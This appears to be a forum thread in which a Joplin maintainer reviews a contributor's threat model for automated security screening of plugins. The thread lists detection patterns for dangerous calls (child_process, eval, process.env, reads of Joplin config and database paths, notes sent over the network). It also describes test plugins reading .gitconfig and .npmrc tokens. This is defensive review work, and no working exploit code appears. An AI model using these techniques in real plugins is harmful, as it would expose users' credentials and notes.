3. Flag: Direct Dependency Typosquatting

If there is a typosquatted package the plugin should be rejected immediately.

was flagged by all three tools. It uses joplin.require('sqlite3') and joplin.require('fs-extra') to load high-privilege Node modules, bypassing the plugin sandbox entirely.

joplin.require is part of the plugin API and certainly not something that "bypasses the plugin sandbox entirely". And by the way Jarvis is not a malicious plugin.

And since your two findings are apparently about joplin.require it means the analysis unfortunately doesn't have much value. I stopped reading there.

I feel you're not taking this seriously and maybe underestimating how important it is.

Among the things you'll do during this project, coding is not the most important part. The coding part is trivial since it can be done in 30 min by an AI.

Where you can bring value is by researching the problem in depth, testing, understanding the plugin API, the security tools, etc. It takes time - several days, but this would be valuable for the open source project. And in fact it would be for you too - companies value people who can produce quality data and reports that can be used to inform business and technical decisions.

So I'm not seeing any serious attempt at it so far. I hope you can reconsider and do it properly but I'm not going to insist on that part if you don't want to do it.

Thanks for the reply and feedback. I was still running a few more tests, I'll keep this feedback in mind

To clarify the intent behind joplin.require() being flagged , it was never meant to label a
plugin as malicious. The idea was to show it as a signal for the human reviewer: "this plugin
is accessing the database or filesystem via joplin.require(), here is exactly which file and line please check if this is not doing something malicious."
The severity in the YAML was set to error during testing which made it appear as a hard result due to which jarvis was shown malicious.

Sorry I am kind of confuse..
Since human review is mandatory in the workflow my focus was to generate a report that contain both, "This is wrong review needed" and "this might be wrong so please review it".

Using the default rules provided by the tools is useless here as every time I ran test without any custom rules they did not gave any usefull outcome. So the threat model will be the final source of truth about what to flag or not :

These one are "This is wrong review needed" :

  • child_process()
  • eval(), Function(), vm.runInContext()
  • process.env access
  • Direct fs access to hardcoded paths like .config/joplin-desktop or database.sqlite
  • net.createServer()

These are "this might be wrong"

  • joplin.data.get(['notes']) followed by network I/O
  • crypto.createCipheriv() overwriting note content
  • joplin.require() โ€” plugin touching database or filesystem
  • joplin.interop.registerExportModule

I have also verified them directly by writing test plugins
and confirming results in Joplin.

The process.env finding is particularly significant the screenshot shows
a full map of the development environment including Git, Docker, Python, Node,
Go, Rust, MySQL, CodeQL and VS Code paths, all readable by any installed plugin
with no user prompt or permission required.

The joplin.require(fs-extra) read sensitive files including .gitconfig (name, email) and authentication credentials from .npmrc and gave access to the authentication token :

Is this a wrong approach? Should I be looking for something else?
I will try to research more on the tools and plugin api

I've updated the top post with a better study... I will be doing more tests and update the post and threat model respectively

I beleive the older threat model was not well defined as you mentioned :

So instead of defining what to flag , I changed many rules to the exact flow that should be flagged like :
GET notes -> POST request using fetch() or axios
joplin.require('fs-extra') -> Uses to read sensitive OS folders etc

This updated threat model I think would be something that satisfy what you actually want to see in a result.

Is this a good approach?

I have also opened a pr for phase 1 of the publish workflow so that we don't get short on time All: Resolves #15595: Added local validations for new publish workflow for plugin ecosystem by akshajrawat ยท Pull Request #15596 ยท laurent22/joplin ยท GitHub,
please review it whenever you get time, Thanks.

Thank you for the updated analysis, this is much better than the earlier one.

Regarding setttings.globalValue() that's indeed a finding that we need to fix separately. You can leave it out for now.

In your data, CodeQL seems about as good as LLM once the rules are written, and of course CodeQL is better in terms of costs and also more deterministic.

Could you please create a new report (you can post an answer here) that focuses on CodeQL and Gemini only?

You mentioned in particular that there's a "huge Zero-Day Blind Spot" for CodeQL and you imply it would be found by the LLM, but you didn't demonstrate it. To actually test this: design one or two attack patterns that aren't in your threat model categories, then run both tools against them. If the LLM catches what CodeQL misses, that's evidence we can work with.

And ideally the rules should be tight enough anyway that it is not possible to go around them (it will probably be a bit of a cat and mouse game).

Regarding XSS, I said "most likely not for XSS either", because many generic CVEs are going to flag things that are mostly relevant to websites, not Electron apps. But some XSS will be relevant to us. I'm a bit concerned that your turned off all XSS rules based on an earlier vague comment without discussing it or considering the impact on your project. Please list which categories of XSS rules are relevant to a Joplin plugin and which aren't.